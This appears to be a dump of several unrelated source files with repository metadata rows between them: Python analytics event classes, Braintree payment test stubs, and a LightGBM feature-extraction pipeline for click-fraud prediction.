exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. 
:param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ InteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class HiddenEvent(NonInteractiveEvent): """ A NonInteractiveEvent that's emitted after a LocationContext has become invisible. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'HiddenEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. 
They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class VisibleEvent(NonInteractiveEvent): """ A NonInteractiveEvent that's emitted after a section LocationContext has become visible. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'VisibleEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. 
The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class SuccessEvent(NonInteractiveEvent): """ A NonInteractiveEvent that is sent when a user action is successfully completed, like sending an email form. Attributes: message (str): Success message. location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'SuccessEvent' def __init__(self, message: str, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param message: Success message. 
:param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, message=message, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class MediaEvent(NonInteractiveEvent): """ The parent of non-interactive events that are triggered by a media player. It requires a MediaPlayerContext to detail the origin of the event. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. 
time (int): Timestamp indicating when the event was generated """ _type = 'MediaEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ NonInteractiveEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class MediaLoadEvent(MediaEvent): """ A MediaEvent that's emitted after a media item completes loading. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. 
On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'MediaLoadEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ MediaEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class MediaPauseEvent(MediaEvent): """ A MediaEvent that's emitted after a media item pauses playback. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. 
id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'MediaPauseEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ MediaEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class MediaStartEvent(MediaEvent): """ A MediaEvent that's emitted after a media item starts playback. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. 
They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'MediaStartEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. :param time: Timestamp indicating when the event was generated """ MediaEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) class MediaStopEvent(MediaEvent): """ A MediaEvent that's emitted after a media item stops playback. Attributes: location_stack (List[AbstractLocationContext]): The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. 
global_contexts (List[AbstractGlobalContext]): Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. id (str): Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. time (int): Timestamp indicating when the event was generated """ _type = 'MediaStopEvent' def __init__(self, location_stack: List[AbstractLocationContext], global_contexts: List[AbstractGlobalContext], id: str, time: int, **kwargs: Optional[Any]): """ :param location_stack: The location stack is an ordered list (stack), that contains a hierarchy of location contexts that deterministically describes where an event took place from global to specific. The whole stack (list) is needed to exactly pinpoint where in the UI the event originated. :param global_contexts: Global contexts add global / general information about the event. They carry information that is not related to where the Event originated (location), such as device, platform or business data. :param id: Unique identifier for a specific instance of an event. Typically UUID's are a good way of implementing this. On the collector side, events should be unique, this means duplicate id's result in `not ok` events. 
:param time: Timestamp indicating when the event was generated """ MediaEvent.__init__(self, location_stack=location_stack, global_contexts=global_contexts, id=id, time=time, **kwargs) def make_context(_type: str, **kwargs) -> AbstractContext: if _type == "AbstractContext": return AbstractContext(**kwargs) if _type == "AbstractGlobalContext": return AbstractGlobalContext(**kwargs) if _type == "ApplicationContext": return ApplicationContext(**kwargs) if _type == "CookieIdContext": return CookieIdContext(**kwargs) if _type == "HttpContext": return HttpContext(**kwargs) if _type == "PathContext": return PathContext(**kwargs) if _type == "SessionContext": return SessionContext(**kwargs) if _type == "MarketingContext": return MarketingContext(**kwargs) if _type == "AbstractLocationContext": return AbstractLocationContext(**kwargs) if _type == "InputContext": return InputContext(**kwargs) if _type == "PressableContext": return PressableContext(**kwargs) if _type == "LinkContext": return LinkContext(**kwargs) if _type == "RootLocationContext": return RootLocationContext(**kwargs) if _type == "ExpandableContext": return ExpandableContext(**kwargs) if _type == "MediaPlayerContext": return MediaPlayerContext(**kwargs) if _type == "NavigationContext": return NavigationContext(**kwargs) if _type == "OverlayContext": return OverlayContext(**kwargs) if _type == "ContentContext": return ContentContext(**kwargs) return AbstractContext(**kwargs) def make_event(_type: str, **kwargs) -> AbstractEvent: if _type == "AbstractEvent": return AbstractEvent(**kwargs) if _type == "InteractiveEvent": return InteractiveEvent(**kwargs) if _type == "NonInteractiveEvent": return NonInteractiveEvent(**kwargs) if _type == "ApplicationLoadedEvent": return ApplicationLoadedEvent(**kwargs) if _type == "FailureEvent": return FailureEvent(**kwargs) if _type == "InputChangeEvent": return InputChangeEvent(**kwargs) if _type == "PressEvent": return PressEvent(**kwargs) if _type == "HiddenEvent": return 
HiddenEvent(**kwargs) if _type == "VisibleEvent": return VisibleEvent(**kwargs) if _type == "SuccessEvent": return SuccessEvent(**kwargs) if _type == "MediaEvent": return MediaEvent(**kwargs) if _type == "MediaLoadEvent": return MediaLoadEvent(**kwargs) if _type == "MediaPauseEvent": return MediaPauseEvent(**kwargs) if _type == "MediaStartEvent": return MediaStartEvent(**kwargs) if _type == "MediaStopEvent": return MediaStopEvent(**kwargs) return AbstractEvent(**kwargs) def make_event_from_dict(obj: Dict[str, Any]) -> AbstractEvent: if not ('_type' in obj and 'location_stack' in obj and 'global_contexts' in obj): raise Exception('missing arguments') obj['location_stack'] = [make_context(**c) for c in obj['location_stack']] obj['global_contexts'] = [make_context( **c) for c in obj['global_contexts']] return make_event(**obj)
44.858407
171
0.6087
6,621
60,828
5.506117
0.047727
0.027869
0.029625
0.022712
0.84074
0.837338
0.824995
0.816519
0.807823
0.800856
0
0
0.333268
60,828
1,355
172
44.891513
0.898905
0.611445
0
0.567839
0
0
0.060484
0.007291
0
0
0
0
0
1
0.090452
false
0
0.007538
0
0.354271
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
9868a3c83ac515eca2dfb6182cc4bb983095e784
145
py
Python
src/__init__.py
U2328/md_template
6750ae65af8bebe32a71b57dc74ccf0c0fb6fa0d
[ "BSD-3-Clause" ]
null
null
null
src/__init__.py
U2328/md_template
6750ae65af8bebe32a71b57dc74ccf0c0fb6fa0d
[ "BSD-3-Clause" ]
null
null
null
src/__init__.py
U2328/md_template
6750ae65af8bebe32a71b57dc74ccf0c0fb6fa0d
[ "BSD-3-Clause" ]
null
null
null
from src.parsing import * from src.filtering import * from src.walking import * __all__ = parsing.__all__ + filtering.__all__ + walking.__all__
24.166667
63
0.77931
19
145
5.105263
0.368421
0.216495
0.268041
0
0
0
0
0
0
0
0
0
0.137931
145
5
64
29
0.776
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.75
0
0.75
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
986c25c08fe1ddc8d3b60a1b561610e28adf727d
312
py
Python
lib/python2.7/site-packages/braintree/test/venmo_sdk.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
182
2015-01-09T05:26:46.000Z
2022-03-16T14:10:06.000Z
lib/python2.7/site-packages/braintree/test/venmo_sdk.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
95
2015-02-24T23:29:56.000Z
2022-03-13T03:27:58.000Z
lib/python2.7/site-packages/braintree/test/venmo_sdk.py
ervinpepic/E-commerce
2c15255d1730728cf35c166b9f88cffcb99f5323
[ "MIT" ]
93
2015-02-19T17:59:06.000Z
2022-03-19T17:01:25.000Z
def generate_test_payment_method_code(number): return "stub-" + number VisaPaymentMethodCode = generate_test_payment_method_code("4111111111111111") InvalidPaymentMethodCode = generate_test_payment_method_code("invalid-payment-method-code") Session = "stub-session" InvalidSession = "stub-invalid-session"
34.666667
91
0.830128
34
312
7.264706
0.441176
0.210526
0.275304
0.303644
0.352227
0
0
0
0
0
0
0.055556
0.076923
312
8
92
39
0.802083
0
0
0
1
0
0.25641
0.086538
0
0
0
0
0
1
0.166667
false
0
0
0.166667
0.333333
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
6
989341b0c66f106c3d19054bd87caab7a6a3206a
24,181
py
Python
pipelines.py
neptune-ml/open-solution-talking-data
1d68c7b119d3811765046d8506251a0d2ba06c6f
[ "MIT" ]
8
2018-04-16T07:15:23.000Z
2019-05-26T04:01:06.000Z
pipelines.py
neptune-ml/open-solution-talking-data
1d68c7b119d3811765046d8506251a0d2ba06c6f
[ "MIT" ]
18
2018-04-17T22:28:16.000Z
2018-04-26T16:55:26.000Z
pipelines.py
neptune-ml/open-solution-talking-data
1d68c7b119d3811765046d8506251a0d2ba06c6f
[ "MIT" ]
8
2018-04-16T07:15:25.000Z
2019-06-25T12:42:53.000Z
from functools import partial from sklearn.metrics import roc_auc_score import feature_extraction as fe from hyperparameter_tuning import RandomSearchOptimizer, NeptuneMonitor, SaveResults from steps.adapters import to_numpy_label_inputs, identity_inputs from steps.base import Step, Dummy from steps.misc import LightGBM def baseline(config, train_mode): if train_mode: features, features_valid = feature_extraction_v0(config, train_mode) light_gbm = classifier_lgbm((features, features_valid), config, train_mode) else: features = feature_extraction_v0(config, train_mode) light_gbm = classifier_lgbm(features, config, train_mode) output = Step(name='output', transformer=Dummy(), input_steps=[light_gbm], adapter={'y_pred': ([(light_gbm.name, 'prediction')]), }, cache_dirpath=config.env.cache_dirpath) return output def solution_1(config, train_mode): if train_mode: features, features_valid = feature_extraction_v1(config, train_mode, save_output=True, cache_output=True, load_saved_output=False) light_gbm = classifier_lgbm((features, features_valid), config, train_mode) else: features = feature_extraction_v1(config, train_mode, cache_output=True) light_gbm = classifier_lgbm(features, config, train_mode) output = Step(name='output', transformer=Dummy(), input_steps=[light_gbm], adapter={'y_pred': ([(light_gbm.name, 'prediction')]), }, cache_dirpath=config.env.cache_dirpath) return output def feature_extraction_v0(config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = _feature_by_type_splits(config, train_mode) categorical_features = Step(name='categorical_features', transformer=Dummy(), input_steps=[feature_by_type_split], adapter={'categorical_features': ( [(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) categorical_features_valid = Step(name='categorical_features_valid', transformer=Dummy(), input_steps=[feature_by_type_split_valid], adapter={'categorical_features': ( 
[(feature_by_type_split_valid.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) feature_combiner = _join_features(numerical_features=[], numerical_features_valid=[], categorical_features=[categorical_features], categorical_features_valid=[categorical_features_valid], config=config, train_mode=train_mode) return feature_combiner else: feature_by_type_split = _feature_by_type_splits(config, train_mode) categorical_features = Step(name='categorical_features', transformer=Dummy(), input_steps=[feature_by_type_split], adapter={'categorical_features': ( [(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) feature_combiner = _join_features(numerical_features=[], numerical_features_valid=[], categorical_features=[categorical_features], categorical_features_valid=[], config=config, train_mode=train_mode) return feature_combiner def feature_extraction_v1(config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = _feature_by_type_splits(config, train_mode) time_delta, time_delta_valid = _time_deltas((feature_by_type_split, feature_by_type_split_valid), config, train_mode, **kwargs) confidence_rate, confidence_rate_valid = _confidence_rates((feature_by_type_split, feature_by_type_split_valid), config, train_mode, **kwargs) feature_combiner, feature_combiner_valid = _join_features(numerical_features=[time_delta, confidence_rate], numerical_features_valid=[time_delta_valid, confidence_rate_valid], categorical_features=[time_delta, confidence_rate], categorical_features_valid=[time_delta_valid, confidence_rate_valid], config=config, train_mode=train_mode, **kwargs) return feature_combiner, feature_combiner_valid else: feature_by_type_split = _feature_by_type_splits(config, train_mode) time_delta = _time_deltas(feature_by_type_split, config, train_mode, **kwargs) confidence_rate = _confidence_rates(feature_by_type_split, config, train_mode, **kwargs) 
feature_combiner = _join_features(numerical_features=[time_delta, confidence_rate], numerical_features_valid=[], categorical_features=[time_delta, confidence_rate], categorical_features_valid=[], config=config, train_mode=train_mode, **kwargs) return feature_combiner def classifier_lgbm(features, config, train_mode, **kwargs): if train_mode: features_train, features_valid = features if config.random_search.light_gbm.n_runs: transformer = RandomSearchOptimizer(LightGBM, config.light_gbm, train_input_keys=[], valid_input_keys=['X_valid', 'y_valid'], score_func=roc_auc_score, maximize=True, n_runs=config.random_search.light_gbm.n_runs, callbacks=[NeptuneMonitor( **config.random_search.light_gbm.callbacks.neptune_monitor), SaveResults( **config.random_search.light_gbm.callbacks.save_results), ] ) else: transformer = LightGBM(**config.light_gbm) light_gbm = Step(name='light_gbm', transformer=transformer, input_data=['input'], input_steps=[features_train, features_valid], adapter={'X': ([(features_train.name, 'features')]), 'y': ([('input', 'y')], to_numpy_label_inputs), 'feature_names': ([(features_train.name, 'feature_names')]), 'categorical_features': ([(features_train.name, 'categorical_features')]), 'X_valid': ([(features_valid.name, 'features')]), 'y_valid': ([('input', 'y_valid')], to_numpy_label_inputs), }, cache_dirpath=config.env.cache_dirpath, **kwargs) else: light_gbm = Step(name='light_gbm', transformer=LightGBM(**config.light_gbm), input_steps=[features], adapter={'X': ([(features.name, 'features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return light_gbm def _feature_by_type_splits(config, train_mode): if train_mode: feature_by_type_split = Step(name='feature_by_type_split', transformer=fe.DataFrameByTypeSplitter(**config.dataframe_by_type_splitter), input_data=['input'], adapter={'X': ([('input', 'X')]), }, cache_dirpath=config.env.cache_dirpath) feature_by_type_split_valid = Step(name='feature_by_type_split_valid', 
transformer=feature_by_type_split, input_data=['input'], adapter={'X': ([('input', 'X_valid')]), }, cache_dirpath=config.env.cache_dirpath) return feature_by_type_split, feature_by_type_split_valid else: feature_by_type_split = Step(name='feature_by_type_split', transformer=fe.DataFrameByTypeSplitter(**config.dataframe_by_type_splitter), input_data=['input'], adapter={'X': ([('input', 'X')]), }, cache_dirpath=config.env.cache_dirpath) return feature_by_type_split def _categorical_frequency_filters(dispatchers, config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = dispatchers categorical_filter = Step(name='categorical_filter', transformer=fe.CategoricalFilter(**config.categorical_filter), input_steps=[feature_by_type_split], adapter={ 'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) categorical_filter_valid = Step(name='categorical_filter_valid', transformer=categorical_filter, input_steps=[feature_by_type_split_valid], adapter={'categorical_features': ( [(feature_by_type_split_valid.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return categorical_filter, categorical_filter_valid else: feature_by_type_split = dispatchers categorical_filter = Step(name='categorical_filter', transformer=fe.CategoricalFilter(**config.categorical_filter), input_data=['input'], input_steps=[feature_by_type_split], adapter={ 'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return categorical_filter def _target_encoders(dispatchers, config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = dispatchers target_encoder = Step(name='target_encoder', transformer=fe.TargetEncoder(**config.target_encoder), input_data=['input'], input_steps=[feature_by_type_split], adapter={'X': 
([(feature_by_type_split.name, 'categorical_features')]), 'y': ([('input', 'y')], to_numpy_label_inputs), }, cache_dirpath=config.env.cache_dirpath, **kwargs) target_encoder_valid = Step(name='target_encoder_valid', transformer=target_encoder, input_data=['input'], input_steps=[feature_by_type_split_valid], adapter={'X': ([(feature_by_type_split_valid.name, 'categorical_features')]), 'y': ([('input', 'y_valid')], to_numpy_label_inputs), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return target_encoder, target_encoder_valid else: feature_by_type_split = dispatchers target_encoder = Step(name='target_encoder', transformer=fe.TargetEncoder(**config.target_encoder), input_data=['input'], input_steps=[feature_by_type_split], adapter={'X': ([(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return target_encoder def _binary_encoders(dispatchers, config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = dispatchers binary_encoder = Step(name='binary_encoder', transformer=fe.BinaryEncoder(), input_steps=[feature_by_type_split], adapter={'X': ([(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) binary_encoder_valid = Step(name='binary_encoder_valid', transformer=binary_encoder, input_steps=[feature_by_type_split_valid], adapter={'X': ([(feature_by_type_split_valid.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return binary_encoder, binary_encoder_valid else: feature_by_type_split = dispatchers binary_encoder = Step(name='binary_encoder', transformer=fe.BinaryEncoder(), input_steps=[feature_by_type_split], adapter={'X': ([(feature_by_type_split.name, 'categorical_features')]), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return binary_encoder def _time_deltas(dispatchers, config, train_mode, **kwargs): if train_mode: feature_by_type_split, 
feature_by_type_split_valid = dispatchers time_delta = Step(name='time_delta', transformer=fe.TimeDelta(**config.time_delta), input_steps=[feature_by_type_split], adapter={'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), 'timestamp_features': ([(feature_by_type_split.name, 'timestamp_features')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) time_delta_valid = Step(name='time_delta_valid', transformer=time_delta, input_steps=[feature_by_type_split_valid], adapter={'categorical_features': ( [(feature_by_type_split_valid.name, 'categorical_features')]), 'timestamp_features': ( [(feature_by_type_split_valid.name, 'timestamp_features')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) return time_delta, time_delta_valid else: feature_by_type_split = dispatchers time_delta = Step(name='time_delta', transformer=fe.TimeDelta(**config.time_delta), input_steps=[feature_by_type_split], adapter={'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), 'timestamp_features': ([(feature_by_type_split.name, 'timestamp_features')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) return time_delta def _confidence_rates(dispatchers, config, train_mode, **kwargs): if train_mode: feature_by_type_split, feature_by_type_split_valid = dispatchers confidence_rates = Step(name='confidence_rates', transformer=fe.ConfidenceRate(**config.confidence_rate), input_data=['input'], input_steps=[feature_by_type_split], adapter={ 'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), 'target': ([('input', 'y')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) confidence_rates_valid = Step(name='confidence_rates_valid', transformer=confidence_rates, input_data=['input'], input_steps=[feature_by_type_split_valid], adapter={'categorical_features': ( [(feature_by_type_split_valid.name, 'categorical_features')]), 'target': ([('input', 'y_valid')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) 
return confidence_rates, confidence_rates_valid else: feature_by_type_split = dispatchers confidence_rates = Step(name='confidence_rates', transformer=fe.ConfidenceRate(**config.confidence_rate), input_data=['input'], input_steps=[feature_by_type_split], adapter={ 'categorical_features': ([(feature_by_type_split.name, 'categorical_features')]), 'target': ([('input', 'y')]) }, cache_dirpath=config.env.cache_dirpath, **kwargs) return confidence_rates def _join_features(numerical_features, numerical_features_valid, categorical_features, categorical_features_valid, config, train_mode, **kwargs): if train_mode: feature_joiner = Step(name='feature_joiner', transformer=fe.FeatureJoiner(), input_steps=numerical_features + categorical_features, adapter={ 'numerical_feature_list': ( [(feature.name, 'numerical_features') for feature in numerical_features], identity_inputs), 'categorical_feature_list': ( [(feature.name, 'categorical_features') for feature in categorical_features], identity_inputs), }, cache_dirpath=config.env.cache_dirpath, **kwargs) feature_joiner_valid = Step(name='feature_joiner_valid', transformer=feature_joiner, input_steps=numerical_features_valid + categorical_features_valid, adapter={'numerical_feature_list': ( [(feature.name, 'numerical_features') for feature in numerical_features_valid], identity_inputs), 'categorical_feature_list': ( [(feature.name, 'categorical_features') for feature in categorical_features_valid], identity_inputs), }, cache_dirpath=config.env.cache_dirpath, **kwargs) return feature_joiner, feature_joiner_valid else: feature_joiner = Step(name='feature_joiner', transformer=fe.FeatureJoiner(), input_steps=numerical_features + categorical_features, adapter={ 'numerical_feature_list': ( [(feature.name, 'numerical_features') for feature in numerical_features], identity_inputs), 'categorical_feature_list': ( [(feature.name, 'categorical_features') for feature in categorical_features], identity_inputs), }, 
cache_dirpath=config.env.cache_dirpath, **kwargs) return feature_joiner PIPELINES = {'baseline': {'train': partial(baseline, train_mode=True), 'inference': partial(baseline, train_mode=False)}, 'solution_1': {'train': partial(solution_1, train_mode=True), 'inference': partial(solution_1, train_mode=False)}, }
54.096197
120
0.4774
1,857
24,181
5.785676
0.063005
0.046351
0.098008
0.127327
0.857781
0.829952
0.805007
0.76815
0.738086
0.727755
0
0.000746
0.445846
24,181
446
121
54.217489
0.801045
0
0
0.646597
0
0
0.07386
0.011538
0
0
0
0
0
1
0.031414
false
0
0.018325
0
0.104712
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
7f91a6df989566483a9fa8128916e06c331a7d8e
42,212
py
Python
Blog_Pack/blog_pack.py
Alpha-Demon404/RE-14
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
[ "MIT" ]
39
2020-02-26T09:44:36.000Z
2022-03-23T00:18:25.000Z
Blog_Pack/blog_pack.py
B4BY-DG/reverse-enginnering
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
[ "MIT" ]
15
2020-05-14T10:07:26.000Z
2022-01-06T02:55:32.000Z
Blog_Pack/blog_pack.py
B4BY-DG/reverse-enginnering
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
[ "MIT" ]
41
2020-03-16T22:36:38.000Z
2022-03-17T14:47:19.000Z
